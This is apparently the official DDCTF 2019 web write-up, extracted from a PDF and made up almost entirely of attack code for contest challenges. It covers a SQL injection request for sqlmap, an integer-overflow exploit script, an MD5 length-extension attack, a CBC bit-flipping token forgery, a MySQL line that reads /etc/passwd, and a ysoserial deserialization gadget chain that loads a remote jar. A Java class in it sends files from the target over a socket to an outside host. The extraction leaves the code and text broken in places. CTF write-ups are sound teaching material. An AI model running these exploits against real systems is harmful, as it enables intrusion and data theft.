【知识库】DDCTF2019官方Write Up——Web篇（二）

App"/>6lsz939vedevmdegkun2wnzb52bszh.burpcollaborator.ne t/">
'${9*9}[!--+*)(&

http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id
=1

GET /Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=1%df* HTTP/1.1 Host: 117.51.147.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/2 0100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://117.51.147.2/Ze02pQYLf5gGNyMn/ Connection: close
Upgrade-Insecure-Requests: 1

python sqlmap.py -r inject.txt --level 3

import requests import json import time import uuid import hashlib

proxies = {'http':'127.0.0.1:8080'}

def create_md5(): m=hashlib.md5()
m.update(bytes(str(time.time()))) return m.hexdigest()

def register_pay():

session = requests.Session()
paramsGet = {"name":create_md5(),"password":create_md5()} print(paramsGet)
headers = {"Accept":"application/json","User-Agent":"Mozilla/5.0 (Maci ntosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0","Refere r":"http://117.51.147.155:5050/index.html","Connection":"close","Accept-La nguage":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("http://117.51.147.155:5050/ctf/api/register", params=paramsGet, headers=headers, proxies=proxies)

time.sleep(0.5)

print(session.cookies)
#print("Status code:    %i" % response.status_code) #print("Response body: %s" % response.content)
paramsGet = {"ticket_price":"4294967296"}
headers = {"Accept":"application/json","User-Agent":"Mozilla/5.0 (Maci ntosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0","Refere r":"http://117.51.147.155:5050/index.html","Connection":"close","Accept-La nguage":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("http://117.51.147.155:5050/ctf/api/buy_ticket"
, params=paramsGet, headers=headers, proxies=proxies)

time.sleep(0.5)
#print("Status code:    %i" % response.status_code) #print("Response body: %s" % response.content)

headers = {"Accept":"application/json","User-Agent":"Mozilla/5.0 (Maci ntosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0","Refere r":"http://117.51.147.155:5050/index.html","Connection":"close","Accept-La nguage":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("http://117.51.147.155:5050/ctf/api/search_bill
_info", headers=headers, proxies=proxies) # print(response.text)

bill_id = json.loads(response.text)['data'][0]["bill_id"]

time.sleep(0.5)
#print("Status code:    %i" % response.status_code) #print("Response body: %s" % response.content)

paramsGet = {"bill_id":bill_id}
headers = {"Accept":"application/json","User-Agent":"Mozilla/5.0 (Maci ntosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0","Refere r":"http://117.51.147.155:5050/index.html","Connection":"close","Accept-La nguage":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("http://117.51.147.155:5050/ctf/api/pay_ticket"
, params=paramsGet, headers=headers, proxies=proxies) #print("Status code:    %i" % response.status_code) #print("Response body: %s" % response.content) time.sleep(0.5)
headers = {"Accept":"application/json","Cache-Control":"max-age=0","Us er-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20 100101 Firefox/66.0","Referer":"http://117.51.147.155:5050/index.html","Co nnection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gz ip, deflate"}
response = session.get("http://117.51.147.155:5050/ctf/api/search_tick et", headers=headers, proxies=proxies)

#print("Status code:    %i" % response.status_code) #print("Response body: %s" % response.content) #print(response.text)
id = json.loads(response.text)['data'][0]['id']
ticket = json.loads(response.text)['data'][0]['ticket'] print(id, ticket)
return id,ticket

def kill(id, ticket): time.sleep(0.5)
session = requests.Session()

paramsGet = {"ticket":ticket,"id":id}
headers = {"Accept":"application/json","User-Agent":"Mozilla/5.0 (Maci ntosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0","Refere r":"http://117.51.147.155:5050/index.html","Connection":"close","Accept-La nguage":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
cookies = {"REVEL_SESSION":"3b2bacbee8fb18e1b1457171b422999d","user_na me":"cl0und"}
response = session.get("http://117.51.147.155:5050/ctf/api/remove_robo t", params=paramsGet, headers=headers, cookies=cookies)

print("Status code:    %i" % response.status_code) print("Response body: %s" % response.content)


if   name     == ' main ': while True:

try:


id, ticket = register_pay() kill(id, ticket) time.sleep(0.5)

except Exception as e: print e

# coding=utf-8

from flask import jsonify, request,redirect from app import mongodb
from app.unitis.tools import get_md5, num64_to_32
from app.main.db_tools import get_balance, creat_env_db, search_bill, secr ity_key, get_bill_id
import uuid
from urllib import unquote mydb = mongodb.db
flag = '''DDCTF{chiken_dinner_hyMCX[n47Fx)}'''

def register():

result = []
user_name = request.args.get('name') password = request.args.get('password')

if not user_name or not password:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []}) return response
if not len(password)>=8:
response = jsonify({"code": 404, "msg": "密码必须大于等于8位", "data"
: []})
return response
else:
hash_val = get_md5(user_name, 'DDCTF_2019')



name}):

if not mydb.get_collection('account').find_one({'user_name': user_

mydb.get_collection('account').insert_one({'user_name': user_n

ame, 'password' :password, 'balance': 100,

l, 'flag': 'test'})


'hash_val': hash_va




result})

tmp_result = {'user_name': user_name, 'account': 100} result.append(tmp_result)
response = jsonify({"code": 200, "msg": "用户注册成功", "data":

response.set_cookie('user_name', user_name) response.set_cookie('REVEL_SESSION', hash_val) response.headers['Server'] = 'Caddy'
return response



[]})

else:
response = jsonify({"code": 404, "msg": "用户已存在", "data":

response.set_cookie('user_name', user_name) response.set_cookie('REVEL_SESSION', hash_val) response.headers['Server'] = 'Caddy'
return response


def login():

result = []
user_name = request.args.get('name') password = request.args.get('password')

if not user_name or not password:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []}) return response
if not mydb.get_collection('account').find_one({'user_name': user_nam e}):


lt})

response = jsonify({"code": 404, "msg": "该用户未注册", "data": resu

return response

if not password == mydb.get_collection('account').find_one({'user_nam e': user_name})['password']:
response = jsonify({"code": 404, "msg": "密码错误", "data": resul

t})


return response else:
hash_val = mydb.get_collection('account').find_one({'user_name': u

ser_name})['hash_val']
response = jsonify({"code": 200, "msg": "登陆成功", "data": resul

t})


response.set_cookie('user_name', user_name) response.set_cookie('REVEL_SESSION', hash_val) response.headers['Server'] = 'Caddy'
return response


def get_user_balance(): result = []
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') if not user_name or not hash_val:
response = jsonify({"code": 404, "msg": "您未登陆", "data": []})
response.headers['Server'] = 'Caddy' return response
else:
str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val == str_md5:
balance = get_balance(user_name) bill_id    = get_bill_id(user_name)
tmp_dic = {'balance': balance , 'bill_id': bill_id} result.append(tmp_dic)
return jsonify({"code": 200, "msg": "查询成功", "data": resul

t})


else:
return jsonify({"code": 404, "msg": "参数错误", "data": []})


def buy_ticket():

result = []
user_name =  request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') ticket_price = int(request.args.get('ticket_price')) if not user_name or not hash_val or not ticket_price:
response = jsonify({"code": 404, "msg": "参数错误", "data": []})
response.headers['Server'] = 'Caddy' return response

str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误", "data": []})
response.headers['Server'] = 'Caddy' return response

if ticket_price <  1000:
response = jsonify({"code": 200, "msg": "ticket门票价格为2000", "da ta": []})
response.headers['Server'] = 'Caddy' return response
if search_bill(user_name): tmp_list = []
bill_tmp = {'bill_id': search_bill(user_name)} tmp_list.append(bill_tmp)
response = jsonify({"code": 200, "msg": "请支付未完成订单", "data":
tmp_list})
response.headers['Server'] = 'Caddy' return response
else:
# 生成uuid 保存订单
hash_id = str(uuid.uuid4())
tmp_dic = {'user_name': user_name, 'ticket_price': ticket_price, 'bill_id': hash_id}
mydb.get_collection('bill').insert_one(tmp_dic) result.append({'user_name': user_name, 'ticket_price': ticket_pric
e, 'bill_id': hash_id})
response = jsonify({"code": 200, "msg": "购买门票成功", "data": resu

lt})


response.headers['Server'] = 'Caddy' return response


def search_bill_info(): result = []
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') if not user_name or not hash_val:
response = jsonify({"code": 404, "msg": "您未登陆", "data": []})
response.headers['Server'] = 'Caddy' return response
else:
str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val == str_md5:
tmp = mydb.get_collection('bill').find_one({'user_name': user_

name})


esult})


if not tmp:
return jsonify({"code": 200, "msg": "不存在订单", "data": r

bill_id = tmp['bill_id'] user_name =user_name
bill_price = tmp['ticket_price']
tmp_dic = {'user_name': user_name, 'bill_id': bill_id, 'bill_p

rice': bill_price}
result.append(tmp_dic)
return jsonify({"code": 200, "msg": "查询成功", "data": resul

t})


else:
return jsonify({"code": 404, "msg": "参数错误", "data": []})




def recall_bill():

result = []
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') bill_id = request.args.get('bill_id')
if not user_name or not hash_val:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []}) response.headers['Server'] = 'Caddy'
return response

str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误", "data": []})
response.headers['Server'] = 'Caddy' return response

tmp =mydb.get_collection('bill').find_one({'bill_id': bill_id}) if not tmp:
response = jsonify({"code": 404, "msg": "订单号不存在", "data": []})
response.headers['Server'] = 'Caddy' return response
if tmp['user_name'] != user_name:
response = jsonify({"code": 404, "msg": "订单号不存在", "data": []}) response.headers['Server'] = 'Caddy'
return response else:
mydb.get_collection('bill').delete_one({'bill_id': bill_id}) tmp_result = {'user_name': tmp['user_name'], 'bill_id': tmp['bill_
id'], 'ticket_price': tmp['ticket_price']} result.append(tmp_result)
response = jsonify({"code": 200, "msg": "订单已取消", "data": resul

t})


response.headers['Server'] = 'Caddy' return response



def pay_ticket():

result = []
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') bill_id = request.args.get('bill_id')
if not user_name or not hash_val or not bill_id:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []}) response.headers['Pay-Server'] = 'Apache-Coyote/1.1'
response.headers['X-Powered-By'] = ' Servlet/3.0' return response

str_md5 = get_md5(user_name, 'DDCTF_2019')

if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误", "data": []}) response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0'
return response
tmp_obj = mydb.get_collection('bill').find_one({'bill_id':bill_id}) if not tmp_obj:
response = jsonify({"code": 404, "msg": "订单信息有误", "data": []})
response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0' return response
tmp_price = mydb.get_collection('bill').find_one({'user_name': user_na me})['ticket_price']
tmp_bill_uuid = mydb.get_collection('bill').find_one({'bill_id': bill_ id})['bill_id']
price = num64_to_32(tmp_price)
tmp_account = mydb.get_collection('account').find_one({'user_name': us er_name})['balance']
if tmp_bill_uuid == bill_id: if tmp_account >= price:
if mydb.get_collection('user_env').find_one({'user_name': user
_name}):
tmp = mydb.get_collection('user_env').find_one({'user_nam
e': user_name})['user_info_list']
for item in tmp:
if item['user_name'] == user_name: result.append(item)
else:
pass
response = jsonify({"code": 200, "msg": "已购买ticket",

"data": result})


response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0'

return response else:
account = tmp_account - price mydb.get_collection('account').update_one({'user_name': us
er_name}, {'$set': {'balance': account}},



d})

upsert=True) mydb.get_collection('bill').delete_one({'bill_id': bill_i

tmp_info = creat_env_db(user_name) mydb.get_collection('user_env').insert_one(tmp_info[0]) tmp_result = {'your_ticket': tmp_info[1]['hash_val'], 'you

r_id': tmp_info[1]['id']}
result.append(tmp_result)
response = jsonify({"code": 200, "msg": "交易成功", "data":

result})



else:


response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0' return response


[]})



else:

response = jsonify({"code": 200, "msg": "余额不足", "data":

response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0' return response

response = jsonify({"code": 200, "msg": "订单信息有误", "data": []}) response.headers['Pay-Server'] = 'Apache-Coyote/1.1' response.headers['X-Powered-By'] = ' Servlet/3.0'
return response

def is_login():
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') if not user_name or not hash_val:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []})
response.headers['Server'] = 'Caddy' return response

str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误", "data": []})
response.headers['Server'] = 'Caddy' return response
response = jsonify({"code": 200, "msg": "您已登陆", "data": []})
return response


def search_ticket(): result = []
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') if not user_name or not hash_val:
response = jsonify({"code": 404, "msg": "参数不能为空", "data": []})
response.headers['Server'] = 'Caddy' return response

str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误", "data": []})
response.headers['Server'] = 'Caddy' return response

tmp = mydb.get_collection('user_env').find_one({'user_name': user_nam
e})

if not tmp:
response = jsonify({"code": 404, "msg": "你还未获取入场券", "data":

[]})


response.headers['Server'] = 'Caddy' return response

if tmp:
tmp_dic = {'ticket': tmp['player_info']['hash_val'], 'id': tmp['pl ayer_info']['id']}
result.append(tmp_dic)
response = jsonify({"code": 200, "msg": "ticket信息", "data": resu

lt})


response.headers['Server'] = 'Caddy' return response



def remove_robot():

result = [] sign_str = ''
user_name = request.cookies.get('user_name') hash_val = request.cookies.get('REVEL_SESSION') a =  request.environ['QUERY_STRING'] params_list = []
for item in a.split('&'): k, v = item.split('=')
params_list.append((k, v))

user_id = request.args.get('id') ticket = request.args.get('ticket')

if not user_name or not hash_val or not user_id or not ticket: response = jsonify({"code": 404, "msg": "参数错误", "data": []}) response.headers['Server'] = 'Caddy'
return response

# if not str.isdigit(user_id):
#    return jsonify({"code": 0, "msg": "参数错误", "data": []})

str_md5 = get_md5(user_name, 'DDCTF_2019') if hash_val != str_md5:
response = jsonify({"code": 404, "msg": "登陆信息有误"

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2/1/2019 10:47 PM
# @Author    : fz # @Site    :
# @File    : tools.py # @Software: PyCharm

import decimal import datetime import types import hashlib

from flask.json import JSONEncoder from urllib import unquote
from urllib import quote_plus
secrity_key = 'Winner, winner, chicken dinner!' def pretty_floats(obj):
if isinstance(obj, float) or isinstance(obj, decimal.Decimal): return round(obj, 2)
elif isinstance(obj, dict):
return dict((k, pretty_floats(v)) for k, v in obj.iteritems()) elif isinstance(obj, (list, tuple)):
return map(pretty_floats, obj) return obj


# 空值变为0
def pretty_data(obj):
if isinstance(obj, types.NoneType) or obj == "": return 0
elif isinstance(obj, dict):
return dict((k, pretty_data(v)) for k, v in obj.iteritems()) elif isinstance(obj, (list, tuple)):
return map(pretty_data, obj) return obj

class CustomJSONEncoder(JSONEncoder): def default(self, obj):
try:


ime.date):

if isinstance(obj, datetime.datetime) or isinstance(obj, datet

encoded_object = obj.strftime('%Y-%m-%d') return encoded_object
iterable = iter(obj)

except TypeError: pass
else:
return list(iterable)
return JSONEncoder.default(self, obj)


#
def percent_div(up,  down): if up == 0 or up is None:
return 0
try:
return round((up / down) * 100, 2)
except ZeroDivisionError: return 0

#
def num64_to_32(num):

str_num =  bin(num) if len(str_num) > 66:
return False
if 34 <  len(str_num) < 66: str_64 = str_num[-32:] result = int(str_64, 2) return result
if len(str_num) <   34: result = int(str_num, 2) return result
#
def get_md5(string, secret_key): m = hashlib.md5() m.update(secret_key+string) return m.hexdigest()


if   name     == " main ":

print get_md5('id137', 'Winner, winner, chicken dinner!') print get_md5('id80', secrity_key)
str = unquote('id80%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%0 0%00%00%00%00%18%01%00%00%00%00%00%00id51')
str_new = secrity_key + str print str_new
print ('''id80x80x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x18x01x00x00x00x00x00x00id51''') print quote_plus('''
''')

set mysql.server.infile /etc/passwd; mysql.server off; mysql.server on;

from Crypto.Util.strxor import strxor from base64 import *
import requests
#pip install pycrypto


def xor(a, b):
return chr(ord(a)^ord(b))

def get_source_code(url, cipher): session = requests.Session() session.cookies['token'] = cipher web = session.get(url)
return web.text

url = 'http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/acco unt_info'

str = 'UGFkT3JhY2xlOml2L2NiY8O+7uQmXKFqNVUuI9c7VBe42FqRvernmQhsxyPnvxaF'

token = b64decode(str)


iv = token[:16] C1 = token[16:32] C2 = token[32:]
raw_iv = 'PadOracle:iv/cbc'

json = '{"id":100,"roleAdmin":false}' D_C1 = strxor(json[:16], raw_iv)


cipher = strxor(strxor(iv, json[:16]), '{"roleAdmin":1,"')+C1+strxor(strxo r(C2, strxor(D_C1, C2)), '":"1","id":001}'+chr(1))+C1
cipher = b64encode(cipher)
state = get_source_code(url, cipher) print state
print cipher

import com.sun.org.apache.xml.internal.security.exceptions.Base64DecodingE xception;
import sun.rmi.server.UnicastRef; import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import javax.management.remote.rmi.RMIConnectionImpl_Stub; import javax.naming.ConfigurationException;
import java.io.ByteArrayOutputStream; import java.io.IOException;
import java.io.ObjectOutputStream; import java.rmi.server.ObjID; import java.util.Random;

public class Poc {
public static void main(String[] args) throws IOException, ClassNotFou ndException, ConfigurationException, Base64DecodingException {

String host; int port; host = "ip"; port = 1099;

ObjID id = new ObjID(new Random().nextInt()); // RMI registry TCPEndpoint te = new TCPEndpoint(host, port);
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); RMIConnectionImpl_Stub stub = new RMIConnectionImpl_Stub(ref);




t);

ByteArrayOutputStream out = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(ou

objectOutputStream.writeObject(stub);


System.out.println(java.util.Base64.getEncoder().encodeToString(ou t.toByteArray()).toString());
}
}

package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap; import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.annotation.PayloadTest; import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections;

import javax.management.BadAttributeValueExpException; import java.lang.reflect.Field;
import java.util.HashMap; import java.util.Map;

/*
Gadget chain:
ObjectInputStream.readObject() AnnotationInvocationHandler.readObject()
Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
LazyMap.get()
ChainedTransformer.transform() ConstantTransformer.transform() InvokerTransformer.transform()
Method.invoke() Class.getMethod()
InvokerTransformer.transform() Method.invoke()
Runtime.getRuntime() InvokerTransformer.transform()
Method.invoke() Runtime.exec()

Requires:
commons-collections
*/
/*
This only works in JDK 8u76 and WITHOUT a security manager

https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b 3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
*/
//@PayloadTest(skip="need more robust way to detect Runtime.exec() without SecurityManager()")
SuppressWarnings({"rawtypes", "unchecked"})
PayloadTest ( precondition = "isApplicableJavaVersion") @Dependencies({"commons-collections:commons-collections:3.1"}) @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
public class CommonsCollections7 extends PayloadRunner implements ObjectPa yload< BadAttributeValueExpException> {

public BadAttributeValueExpException getObject(final String fileName) throws Exception {
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(java.net.URLClassLoader.class),
// getConstructor class.class classname new InvokerTransformer("getConstructor",
new Class[] { Class[].class },
new Object[] { new Class[] { java.net.URL[].class } }),
// newinstance string http://www.iswin.org/attach/iswin.jar new InvokerTransformer(
"newInstance",
new Class[] { Object[].class },
new Object[] { new Object[] { new java.net.URL[] { new jav

a.net.URL(




}),


"http://ip:8080/getflag2.jar") } } }),
// loadClass String.class R
new InvokerTransformer("loadClass",
new Class[] { String.class }, new Object[] { "getflag2"

// set the target reverse ip and port new InvokerTransformer("getConstructor",
new Class[] { Class[].class },
new Object[] { new Class[] { String.class } }),
// invoke
new InvokerTransformer("newInstance", new Class[] { Object[].class },
new Object[] { new String[] { fileName } }), new ConstantTransformer(1) };


final Map innerMap = new HashMap();

final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

BadAttributeValueExpException val = new BadAttributeValueExpExcept ion(null);
Field valfield = val.getClass().getDeclaredField("val"); valfield.setAccessible(true);
valfield.set(val, entry);

Reflections.setFieldValue(transformerChain, "iTransformers", trans formers); // arm with actual transformer chain

return val;
}

public static void main(final String[] args) throws Exception { PayloadRunner.run(CommonsCollections7.class, args);
}

public static boolean isApplicableJavaVersion() { return JavaVersion.isBadAttrValExcReadObj();
}

}


重新打包后丢到自己的vps上，顺便在在vps打包一个getflag2.jar Getflag2.java

import java.io.*; import java.net.Socket;

public class Getflag2 {
public Getflag2(String fileName) { try {

Socket socket = new Socket("ip", 8080);
OutputStream socketOutputStream = socket.getOutputStream();
DataOutputStream dataOutputStream = new DataOutputStream(socke tOutputStream);

File file = new File(fileName);

if (file.isDirectory()) {
for (File temp : file.listFiles()) { dataOutputStream.writeUTF(temp.toString());




e);

}
} else {
FileInputStream fileInputStream = new FileInputStream(fil

InputStreamReader inputStreamReader = new InputStreamReade

r(fileInputStream);
BufferedReader bufferedReader = new BufferedReader(inputSt
reamReader);

String line;
while ((line = bufferedReader.readLine()) != null) { dataOutputStream.writeUTF(line);
}
}
dataOutputStream.flush();


} catch (FileNotFoundException e) { e.printStackTrace();
} catch (IOException e) { e.printStackTrace();
}
}
}

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1 099 CommonsCollections7 '/etc/passwd'